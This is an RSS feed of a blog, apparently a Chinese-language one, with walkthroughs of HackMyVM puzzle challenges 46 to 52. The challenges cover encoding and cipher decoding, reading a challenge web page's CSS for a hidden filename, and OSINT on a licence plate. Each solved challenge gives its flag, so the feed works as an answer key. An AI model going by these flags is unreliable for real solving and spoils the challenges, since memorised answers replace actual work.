https://7r1UMPH.github.io当你的才华不足以满足你的野心时，应该静下心来努力学习。Triumph Bloghttp://www.rssboard.org/rss-specificationpython-feedgenhttps://7r1umph.top/image/202506121404919.webphttps://7r1UMPH.github.ioWed, 13 Aug 2025 16:25:42 +0000Triumph Blog60Triumph Bloghttps://7r1UMPH.github.io/post/Challenge%20052.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 052.zip Archive: 052.zip extracting: 052.png inflating: 052.txt ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 052.txt Good morning agent X, You have been selected for another important mission. You need to locate a persons flight and the airport were he arrived. We were able to get the date from his cellphone, but it appears encrypted with some sofisticated technique, Have a great hunt agent X, Sh4dowExe RCdgQV4/XVxJO3tGV1Z3UzRRdHIwYG9vSmw3WiInRERCQkFSYWFfdSl5W1p2b3RtM3FTaS9tbGVNaWhhJ2VeY1wiIV9eQFxbVFN3VzlPTk1McEpPSGxGS0RDZypAZD49QjtAPzhcNjU0WDgxNjU0MyxQKilNbm0lSUg1 P.S. We, also, were able to retrieve this: 6tmc`F^ZgDA8*0&i%-!lFWbX7EZf1:+ELt4F)N1CATVs2%178mA8*/sASl@'+Cf>1DKU&8+Cf>-+D5_'DBNP&EdD:J%16TYAKYf'+C\c$FD5<(+CfG7A7]RoASuU$+Co1/Eb0?5D_; I’m sure that with your capabilities you can solve it. ``` ``` RCdgQV4/XVxJO3tGV1Z3UzRRdHIwYG9vSmw3WiInRERCQkFSYWFfdSl5W1p2b3RtM3FTaS9tbGVNaWhhJ2VeY1wiIV9eQFxbVFN3VzlPTk1McEpPSGxGS0RDZypAZD49QjtAPzhcNjU0WDgxNjU0MyxQKilNbm0lSUg1 ``` 暂时看不出来是什么，我试了下XOR，无果 然后就尝试附件 ``` 6tmc`F^ZgDA8*0&i%-!lFWbX7EZf1:+ELt4F)N1CATVs2%178mA8*/sASl@'+Cf>1DKU&8+Cf>-+D5_'DBNP&EdD:J%16TYAKYf'+C\c$FD5<(+CfG7A7]RoASuU$+Co1/Eb0?5D_; ``` 是base85  ``` 在这边，在那边，在那阴森的岩石上， 我看见长着角的魔鬼，手里拿着巨大的鞭子， 在后面残忍地鞭打着他们。https://7r1UMPH.github.io/post/Challenge%20052.htmlMon, 23 Jun 2025 14:08:04 +0000https://7r1UMPH.github.io/post/Challenge%20051.html ``` 2zx42j1ji5x05cj64f2lt5zc56a6w0 ``` CyberChef识别不了，就是意思是不是常见的 dcode是有一个识别密码的功能的，试试 https://www.dcode.fr/cipher-identifier  https://www.dcode.fr/twin-hex-cipher  ``` HMV{4noth3r_C1pher} ``` 。https://7r1UMPH.github.io/post/Challenge%20051.htmlMon, 23 Jun 2025 14:07:50 +0000https://7r1UMPH.github.io/post/Challenge%20050.html ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/ HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 21 Jun 2025 05:54:19 GMT Content-Type: text/html Content-Length: 317 Last-Modified: Sun, 02 Jun 2024 17:47:47 GMT Connection: keep-alive ETag: '665cb043-13d' Accept-Ranges: bytes <!DOCTYPE html> <html lang='en'> <head> <meta charset='UTF-8'> <title>HackMyVM - Sertor</title> <link rel='icon' href='logo.png' type='image/png' sizes='16x16'> <link href='index.css' type='text/css' rel='stylesheet'> </head> <body> <p id='smoothkeyset'> THIS LOOKS SO CLEAN! </p> </body> </html> ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/logo.png HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 21 Jun 2025 05:57:21 GMT Content-Type: text/html Content-Length: 153 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.18.0</center> </body> </html> ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/index.css HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 21 Jun 2025 05:57:39 GMT Content-Type: text/css Content-Length: 451 Last-Modified: Sun, 02 Jun 2024 17:48:30 GMT Connection: keep-alive ETag: '665cb06e-1c3' Accept-Ranges: bytes body { background: rgb(123, 0, 128); background: linear-gradient(90deg, rgba(123, 0, 128, 1) 0%, rgba(205, 0, 187, 1) 34%, rgba(255, 0, 134, 1) 68%); } body #smoothkeyset { position: absolute; right: 45vw; top: 45vh; color: white; font-family: 'Lucida Sans', 'dGhpc2lzbXlrZXkuY3NzLnR4dA==', sans-serif; font-size: large; font-style: italic; text-decoration: white underline solid 6px; cursor: default; } ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ echo dGhpc2lzbXlrZXkuY3NzLnR4dA== |base64 -d thisismykey.css.txt ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/0r1g04szt0p/thisismykey.css.txt HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 21 Jun 2025 05:57:57 GMT Content-Type: text/plain Content-Length: 20 Last-Modified: Sun, 02 Jun 2024 17:48:38 GMT Connection: keep-alive ETag: '665cb076-14' Accept-Ranges: bytes HMV{wonderfulltext} ``` 。https://7r1UMPH.github.io/post/Challenge%20050.htmlSat, 21 Jun 2025 06:02:54 +0000https://7r1UMPH.github.io/post/Challenge%20049.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 049.zip Archive: 049.zip inflating: ourobouros ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat ourobouros 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 z4oUKaKB/fuq4+vt5eHhYcfuADiDYsV8FDphrLp06qDxoZP04Ucf/3Vb3Tq1DQ+aBOB4fHx81Ltn d02dPvOvn5Ut+6hGBgepXt1X7NgZcostg7G/MFHvfgO0a/cehjoCMN2OXbs1IXSSTpw4qYS4DXqs fHl7twQgD1y/fl11X22olJQUhjo6IcIKTHX69BmlpKYy1BFAnkhNTdWnBz9TrZo17N0KgDx0+PCX Klv2UYY6OiHCCgAAAABL4gv2AAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIA AADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJ sAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAA ACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggr AAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADAkggrAAAAACyJsAIAAADA kv4fmdy7yXs3RecAAAAASUVORK5CYII= ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat ourobouros|base64 -d > our ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll our -rwxr-xr-x 1 kali kali 7775 Jun 21 01:02 our ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ file our our: PNG image data, 811 x 137, 8-bit/color RGBA, non-interlaced ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ mv our our.png ```  google一下  https://www.dcode.fr/pigpen-cipher  第一个 ``` HMV{NOTILLUMINATI} ``` 。https://7r1UMPH.github.io/post/Challenge%20049.htmlSat, 21 Jun 2025 06:02:42 +0000https://7r1UMPH.github.io/post/Challenge%20048.html 下载，解压  一个类似于车牌 google一下  乌克兰 前两位字母表示**注册地的区域代码** AA 是基辅 ``` HMV{kyiv} ``` 。https://7r1UMPH.github.io/post/Challenge%20048.htmlSat, 21 Jun 2025 06:02:28 +0000https://7r1UMPH.github.io/post/Challenge%20047.html ``` <pre> magic_num_list = [12, 43, 36, 47, 21, 40, 23, 42, 14, 54, 10, 53, 14, 36, 32, 40, 28, 50, 22, 40] Hint: Use python code for decoding the magic_num_list... </pre> ``` 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 47.zip Archive: 47.zip inflating: 47.py ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 47. cat: 47.: No such file or directory ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 47.py import string def magic_encode(flag): flag, magic_num_list = divmod(flag, 61) return f'{string.digits[1:] + string.ascii_uppercase + string.ascii_lowercase}' [magic_num_list] ``` 61 进制映射 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 47p.py import string base61_table = string.digits[1:] + string.ascii_uppercase + string.ascii_lowercase magic_num_list = [12, 43, 36, 47, 21, 40, 23, 42, 14, 54, 10, 53, 14, 36, 32, 40, 28, 50, 22, 40] decoded = ''.join(base61_table[i] for i in magic_num_list) print(decoded) ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ python3 $_ DibmMfOhFtBsFbXfTpNf ``` 但是我拿去交，错的 那就有一种可能了，编码表的顺序可能有问题 我们直接爆破 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat 47p.py import string magic_num_list = [12, 43, 36, 47, 21, 40, 23, 42, 14, 54, 10, 53, 14, 36, 32, 40, 28, 50, 22, 40] tables = { 'digits[1:] + uppercase + lowercase': string.digits[1:] + string.ascii_uppercase + string.ascii_lowercase, 'digits + lowercase + uppercase': string.digits + string.ascii_lowercase + string.ascii_uppercase, 'digits + uppercase + lowercase': string.digits + string.ascii_uppercase + string.ascii_lowercase, 'uppercase + lowercase + digits': string.ascii_uppercase + string.ascii_lowercase + string.digits, } for name, table in tables.items(): try: decoded = ''.join(table[i] for i in magic_num_list) print(f'{name} --> {decoded}') except IndexError: print(f'{name} --> IndexError: 表长度不足') ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ python3 $_ digits[1:] + uppercase + lowercase --> DibmMfOhFtBsFbXfTpNf digits + lowercase + uppercase --> cHALlEnGeSaReAwEsOmE digits + uppercase + lowercase --> ChalLeNgEsArEaWeSoMe uppercase + lowercase + digits --> MrkvVoXqO2K1OkgocyWo ``` 一个个试 这个是对的cHALlEnGeSaReAwEsOmE ``` HMV{cHALlEnGeSaReAwEsOmE} ``` 。https://7r1UMPH.github.io/post/Challenge%20047.htmlSat, 21 Jun 2025 06:02:16 +0000https://7r1UMPH.github.io/post/Challenge%20046.html暂时没事干，刷一下挑战  下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 046.zip Archive: 046.zip inflating: 046.txt ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat -A 046.txt x=W0oyRmlZMlJsWm1kb2FXcHJiRzF1YjNCeGNuTjBkWFozZUhsNlFVSkRSRVZHUjBoSlNrdE1UVTVQVUZGU1UxUlZWbGRZV1ZvbklDZDZlWGgzZG5WMGMzSnhjRzl1Yld4cm;y=FtbG9aMlpsWkdOaVlWcFpXRmRXVlZSVFVsRlFUMDVOVEV0S1NVaEhSa1ZFUTBKQkp3bz0sIEhWMUR2M1FvQjNFYngyb2V5bTBQXQo=;x+y^M$ ^M$ ^M$ ^M$ ^M$ ``` 目测是base64 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ echo -n 'W0oyRmlZMlJsWm1kb2FXcHJiRzF1YjNCeGNuTjBkWFozZUhsNlFVSkRSRVZHUjBoSlNrdE1UVTVQVUZGU1UxUlZWbGRZV1ZvbklDZDZlWGgzZG5WMGMzSnhjRzl1Yld4cm' | wc -c 130 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ echo -n 